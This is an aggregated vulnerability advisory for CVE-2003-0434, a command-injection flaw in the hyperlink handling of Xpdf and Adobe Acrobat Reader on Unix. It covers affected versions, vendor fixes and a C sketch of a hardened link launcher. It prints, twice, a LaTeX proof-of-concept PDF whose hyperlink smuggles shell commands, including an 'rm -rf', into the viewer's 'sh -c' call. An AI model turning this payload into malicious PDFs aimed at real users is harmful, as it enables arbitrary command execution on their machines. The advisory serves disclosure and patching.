CVE-2003-0434
CVSS 7.5
Published: 2003-07-24 00:00:00
Revised: 2016-10-17 22:33:51

[Original] Various PDF viewers including (1) Adobe Acrobat 5.06 and (2) Xpdf 1.01 allow remote attackers to execute arbitrary commands via shell metacharacters in an embedded hyperlink.


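[CNNVD] Multiple Vendor PDF Hyperlink Arbitrary Command Execution Vulnerability (CNNVD-200307-028)

Acrobat Reader and Xpdf are programs used to view PDF files.
Acrobat Reader and Xpdf do not properly filter the content of hyperlinks. A remote attacker can exploit this by enticing a user to open a malicious PDF file, causing the commands it contains to be executed with the privileges of the user's process.
PDF files may contain hyperlinks. Because the viewer does not filter the link content when handling a hyperlink, and hands the request off through an 'sh -c' call, a specially crafted hyperlink causes the embedded command to be passed directly to the shell. On successful exploitation the command runs with the privileges of the user's process.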
        

- CVSS (Base Score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (Affected Platforms and Products)

cpe:/o:redhat:enterprise_linux:2.1::advanced_server
cpe:/o:redhat:linux:7.1  Red Hat Linux 7.1
cpe:/o:redhat:linux:8.0  Red Hat Linux 8.0
cpe:/o:redhat:enterprise_linux:2.1::enterprise_server
cpe:/o:redhat:linux:7.2  Red Hat Linux 7.2
cpe:/o:redhat:linux:9.0  Red Hat Linux 9.0
cpe:/o:mandrakesoft:mandrake_linux_corporate_server:2.1  MandrakeSoft Mandrake Linux Corporate Server 2.1
cpe:/a:xpdf:xpdf:1.1
cpe:/a:adobe:acrobat:5.0.6  Adobe Acrobat 5.0.6
cpe:/o:redhat:linux:7.3  Red Hat Linux 7.3
cpe:/o:redhat:linux_advanced_workstation:2.1::itanium
cpe:/o:mandrakesoft:mandrake_linux:9.1  MandrakeSoft Mandrake Linux 9.1
cpe:/o:mandrakesoft:mandrake_linux:9.0  MandrakeSoft Mandrake Linux 9.0
cpe:/o:redhat:enterprise_linux:2.1::workstation

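- OVAL (Technical Details for Detection)

oval:org.mitre.oval:def:664  Code Execution Vulnerability in XPDF PDF Viewer
* OVAL describes in detail how to detect this vulnerability; further technical details on detection are available in the related OVAL definition.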

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0434
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0434
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200307-028
(Official data source) CNNVD

- Other Links and Resources

http://lists.grok.org.uk/pipermail/full-disclosure/2003-June/005719.html
(UNKNOWN)  FULLDISC  20030613 -10Day CERT Advisory on PDF Files
http://marc.info/?l=bugtraq&m=105777963019186&w=2
(UNKNOWN)  BUGTRAQ  20030709 xpdf vulnerability - CAN-2003-0434
http://www.kb.cert.org/vuls/id/200132
(UNKNOWN)  CERT-VN  VU#200132
http://www.mandriva.com/security/advisories?name=MDKSA-2003:071
(UNKNOWN)  MANDRAKE  MDKSA-2003:071
http://www.redhat.com/support/errata/RHSA-2003-196.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2003:196
http://www.redhat.com/support/errata/RHSA-2003-197.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2003:197

- Vulnerability Information

Multiple Vendor PDF Hyperlink Arbitrary Command Execution Vulnerability
High risk  Input validation
2003-07-24 00:00:00 2007-02-07 00:00:00
Remote
        
        

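- Advisories and Patches

        Vendor patches:
        Adobe
        -----
        The vendor has not yet provided a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version:

        http://www.adobe.com

        Xpdf
        ----
        The vendor has not yet provided a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version:

        http://www.foolabs.com/xpdf/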

- Vulnerability Information (22771)

Adobe Acrobat Reader (UNIX) 5.0 6, Xpdf 0.9x Hyperlinks Arbitrary Command Execution (EDBID:22771)
linux remote
2003-06-13 Verified
0 Martyn Gilmore
N/A
source: http://www.securityfocus.com/bid/7912/info

A vulnerability has been reported for multiple PDF viewers for Unix variant operating systems. The problem is said to occur when hyperlinks have been enabled within the viewer. Allegedly, by placing a specially formatted hyperlink within a PDF file it is possible to execute arbitrary shell commands when a user clicks the link. This is due to the PDF viewer invoking an external application, via a call to 'sh -c', to handle the request.

Successful exploitation of this vulnerability could potentially allow an attacker to execute arbitrary commands on a target system with the privileges of the user invoking the PDF document.

It should be noted that this vulnerability may be similar to that described in BID 1624.

** Reports suggest that the fixes supplied by Red Hat and Mandrake Linux do not adequately fix the problem. Specifically, the fixes make changes to xpdf to filter out back quote characters. The problem lies in the fact that other shell metacharacters are not filtered. Thus it may still be possible for attackers to execute arbitrary commands. Red Hat has released updated advisories to correct this oversight. 

\documentclass[11pt]{minimal}
\usepackage{color}
\usepackage[urlcolor=blue,colorlinks=true,pdfpagemode=none]{hyperref}
\begin{document}
\href{prot:hyperlink with stuff, say, `rm -rf /tmp/abc`; touch /tmp/pqr}{\texttt{Click me}}
\end{document}		

- Vulnerability Information

9293
Multiple PDF Viewers Embedded Hyperlink Shell Metacharacter Command Execution

- Vulnerability Description

Unknown or Incomplete

- Timeline

2003-06-14 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- Related References

- Vulnerability Author

Unknown or Incomplete

- Vulnerability Information

Multiple Vendor PDF Hyperlinks Arbitrary Command Execution Vulnerability
Input Validation Error 7912
Yes No
2003-06-13 12:00:00 2009-07-11 10:06:00
The discovery of this vulnerability has been credited to Martyn Gilmore <gilmore@floraxion.com>.

- Affected Program Versions

Yellow Dog Linux 3.0
Xpdf Xpdf 2.0 1
+ Conectiva Linux 9.0
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ Terra Soft Solutions Yellow Dog Linux 3.0
Xpdf Xpdf 2.0
Xpdf Xpdf 1.0 1
+ Gentoo Linux 1.4 _rc1
+ Gentoo Linux 1.2
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ Mandriva Linux Mandrake 9.0
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
+ Mandriva Linux Mandrake 7.2
Xpdf Xpdf 1.0 0
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Workstation 8.0
Xpdf Xpdf 0.93
+ Conectiva Linux 8.0
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
Xpdf Xpdf 0.92
+ Conectiva Linux 7.0
+ Sun Linux 5.0.6
+ Sun Linux 5.0.5
+ Sun Linux 5.0.3
+ Sun Linux 5.0
+ Turbolinux Turbolinux 6.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Workstation 7.0
Turbolinux Turbolinux Workstation 8.0
Turbolinux Turbolinux Workstation 7.0
Turbolinux Turbolinux Server 8.0
Turbolinux Turbolinux Server 7.0
Turbolinux Turbolinux 6.0
Sun Linux 5.0.6
Sun Linux 5.0.5
Sun Linux 5.0.3
Sun Linux 5.0
+ Sun LX50
RedHat Linux Advanced Work Station 2.1
RedHat Linux 9.0 i386
RedHat Linux 8.0 i386
RedHat Linux 7.3 i386
RedHat Linux 7.2 ia64
RedHat Linux 7.2 i386
RedHat Linux 7.1
RedHat Enterprise Linux WS 2.1 IA64
RedHat Enterprise Linux WS 2.1
RedHat Enterprise Linux ES 2.1 IA64
RedHat Enterprise Linux ES 2.1
Red Hat Enterprise Linux AS 2.1 IA64
Red Hat Enterprise Linux AS 2.1
Adobe Acrobat Reader (UNIX) 5.0 6

- Vulnerability Discussion

A vulnerability has been reported for multiple PDF viewers for Unix variant operating systems. The problem is said to occur when hyperlinks have been enabled within the viewer. Allegedly, by placing a specially formatted hyperlink within a PDF file it is possible to execute arbitrary shell commands when a user clicks the link. This is due to the PDF viewer invoking an external application, via a call to 'sh -c', to handle the request.

Successful exploitation of this vulnerability could potentially allow an attacker to execute arbitrary commands on a target system with the privileges of the user invoking the PDF document.

It should be noted that this vulnerability may be similar to that described in BID 1624.

** Reports suggest that the fixes supplied by Red Hat and Mandrake Linux do not adequately fix the problem. Specifically, the fixes make changes to xpdf to filter out back quote characters. The problem lies in the fact that other shell metacharacters are not filtered. Thus it may still be possible for attackers to execute arbitrary commands. Red Hat has released updated advisories to correct this oversight.
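Added example (not part of the original advisory and not code from Xpdf or Acrobat): a C sketch of why the back-quote-only filter described above is incomplete, next to a launch path that avoids 'sh -c' altogether. The function names, the metacharacter set and the sample links are constructed for illustration.

```c
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* The incomplete fix: remove only back quotes from the link text. */
static void strip_backquotes(const char *in, char *out, size_t n) {
    size_t j = 0;
    for (; *in && j + 1 < n; in++)
        if (*in != '`') out[j++] = *in;
    out[j] = '\0';
}

/* 1 if the string holds any character /bin/sh treats specially.
   Ordinary URLs contain '?', '&' and '#', so a deny-list either
   breaks valid links or misses something. */
static int has_shell_meta(const char *s) {
    return s[strcspn(s, "`$;&|<>(){}[]*?!~#\\\"' \t\r\n")] != '\0';
}

/* Hardened launch: no shell is involved; the link reaches the handler
   as exactly one argv element, whatever characters it contains.
   Returns the handler's exit status, or -1 on failure. */
static int launch_handler(const char *handler, const char *link) {
    int st;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execlp(handler, handler, link, (char *)NULL);
        _exit(127);                      /* exec failed */
    }
    if (waitpid(pid, &st, 0) < 0) return -1;
    return WIFEXITED(st) ? WEXITSTATUS(st) : -1;
}

int main(void) {
    /* Constructed sample link with a harmless payload. */
    const char *link = "prot:a`echo A`; echo B";
    char filtered[128];
    strip_backquotes(link, filtered, sizeof filtered);
    printf("after back-quote filter: %s (metacharacters left: %d)\n",
           filtered, has_shell_meta(filtered));
    /* 'echo' stands in for the external link handler: it prints the
       link literally because no shell ever parses it. */
    return launch_handler("echo", link) == 0 ? 0 : 1;
}
```

The handler itself must still treat its argument as data, for example by rejecting links that begin with '-' or use an unexpected scheme.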

- Exploit

The following proof of concept was provided by Andries.Brouwer@cwi.nl:

\documentclass[11pt]{minimal}
\usepackage{color}
\usepackage[urlcolor=blue,colorlinks=true,pdfpagemode=none]{hyperref}
\begin{document}
\href{prot:hyperlink with stuff, say, `rm -rf /tmp/abc`; touch /tmp/pqr}{\texttt{Click me}}
\end{document}

The source of a sample PDF file has been released which demonstrates this issue.

- Solution

Red Hat has released an updated advisory RHSA-2003:196-02 to address this issue. Information regarding obtaining and applying fixes is available in the referenced advisory.

Conectiva has released advisory (CLA-2003:674) to address this issue. Fixes are available below.

Gentoo Linux has released advisory 200306-11 to address this issue. Affected users are advised to issue the following commands to update vulnerable systems:

emerge sync
emerge xpdf
emerge clean

Gentoo Linux has released advisory 200306-12 to address this issue. Affected users are advised to issue the following commands to update vulnerable systems:

emerge sync
emerge acroread
emerge clean

TurboLinux has released an advisory. Affected users are advised to use the turbopkg tool to apply the updates. Further information is available in the referenced advisory.

Mandrake has released an updated advisory (MDKSA-2003:071-1) that addresses this issue. Please see the attached advisory for details on obtaining and applying fixes. The previous Mandrake advisory (MDKSA-2003:071) did not properly address all of these issues.

Sun has released a fix for Sun Linux 5.0.6.

Red Hat has released an updated advisory (RHSA-2003:197-10) that addresses this issue on Enterprise platforms. Please see the attached advisory for further details. These fixes are only available via the Red Hat Network.

Yellow Dog has released an advisory and fixes to address this issue.

The following fixes are available:


Xpdf Xpdf 0.92

Xpdf Xpdf 1.0 1

Xpdf Xpdf 1.0 0

Xpdf Xpdf 2.0 1

Yellow Dog Linux 3.0

RedHat Linux 7.1

RedHat Linux 7.2 i386

RedHat Linux 7.2 ia64

RedHat Linux 7.3 i386

RedHat Linux 8.0 i386

RedHat Linux 9.0 i386

- Related References

 

 
